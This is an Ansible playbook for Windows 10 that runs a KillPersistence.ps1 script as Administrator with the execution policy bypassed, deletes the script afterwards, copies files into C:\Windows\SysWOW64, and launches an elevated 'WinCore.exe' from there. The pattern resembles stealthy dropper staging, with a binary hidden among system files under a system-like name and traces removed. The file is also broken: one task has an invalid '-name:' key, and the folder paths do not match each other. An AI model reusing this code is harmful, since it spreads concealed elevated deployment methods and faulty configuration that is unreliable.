
- name: Deploy files and run executables on Windows 10
  hosts: windows
  tasks:
    - name: Delete the PersistenceDebugging folder if it exists
      win_file:
        path: C:\\PersistenceDebugging
        state: absent

    - name: Copy PowerShell script to the target machine
      win_copy:
        src: files/KillPersistence.ps1
        dest: C:\\Windows\\KillPersistence.ps1
        remote_src: no

    - name: Run PowerShell script as Administrator
      win_shell: |
        Start-Process PowerShell -ArgumentList "-ExecutionPolicy Bypass -File C:\\Windows\\KillPersistence.ps1" -Verb RunAs -Wait
      become: yes
      become_method: runas

    - name: Delete the PowerShell script after execution
      win_file:
        path: C:\\Windows\\KillPersistence.ps1
        state: absent

    - name: Copy files from each source directory to its target location
      win_shell: |
        Get-ChildItem -Path Deployment1To-SysWOW64 -File | ForEach-Object {
            Copy-Item -Path $_.FullName -Destination C:\Windows\SysWOW64\ -Force
        }

    - name: Run the primary watchdog binary as Administrator for WinCore.exe
      win_shell: |
        Start-Process "C:\Windows\SysWOW64\WinCore.exe" -Verb RunAs

    -name: Create the PersistenceDebugging folder if it does not exist
      win_file:
        path: C:\\Windows\\PersistenceDebugging
        state: directory

    - name: Copy Debug File to PersistenceDebugging
      win_copy:
        src: files/Debug.ps1
        dest: C:\\Windows\\PersistenceDebugging
        recurse: yes